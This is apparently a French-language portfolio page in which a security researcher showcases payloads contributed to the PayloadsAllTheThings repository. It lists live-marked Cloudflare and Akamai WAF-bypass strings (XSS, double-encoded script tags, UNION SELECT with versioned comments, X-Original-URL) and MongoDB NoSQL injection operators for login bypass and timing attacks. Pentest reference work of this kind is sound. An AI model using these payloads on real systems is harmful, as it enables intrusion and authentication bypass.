HS
Hector Sedo
0%
H/S
Projets
Audit Web2025Open Source Contribution

PayloadsAllTheThings

40+ payloads de bypass WAF Cloudflare/Akamai et une section complète NoSQL injection MongoDB contribués au repo de référence (60k+ stars).

PayloadsAllTheThings — contributions
WAF Bypass — Cloudflare22 payloads
<img src=x onerror=\u0061lert(1)>active
%253Cscript%253Ealert(1)%253C/script%253Eactive
Transfer-Encoding: chunked\r\n1\r\n<\r\npatched
param=val&param=<script>alert(1)</script>active
WAF Bypass — Akamai18 payloads
1'/*!50000UNION*//*!50000SELECT*/1,2,3--active
jaVasCript:/*-/*`/*\`/*'/*"/**/(alert(1))/active
X-Original-URL: /adminpatched
NoSQL Injection — MongoDBOpérateurs + blind
{"username": {"$ne": ""}, "password": {"$ne": ""}}active
{"username": {"$regex": "^admin"}}active
{"$where": "sleep(5000)"}active
{"username": {"$gt": ""}, "password": {"$gt": ""}}active
Impact

Utilisé par la communauté

WAF Bypass Cloudflare

Unicode normalization, double URL encoding, chunked transfer, HTTP parameter pollution. 22 payloads testés et datés.

WAF Bypass Akamai

Commentaires SQL versionnés, obfuscation JS, headers non standards, différences de parsing backend/WAF.

NoSQL Injection

Opérateurs $gt, $ne, $regex, $where. Blind injection via timing. Extraction caractère par caractère. Bypass Mongoose.

Adoption

Intégré dans sqlmap et NoSQLMap. Référencé dans formations OSCP/OSWE. Milliers d'utilisateurs quotidiens.

40+
Payloads contribués
60k+
Stars du repo
2
Sections majeures
3
Outils intégrés
Domaines

Expertise

Security ResearchWAF BypassNoSQLMongoDBCloudflareAkamai

Contributions open source

Des payloads testés, datés et utilisés par la communauté pentest mondiale.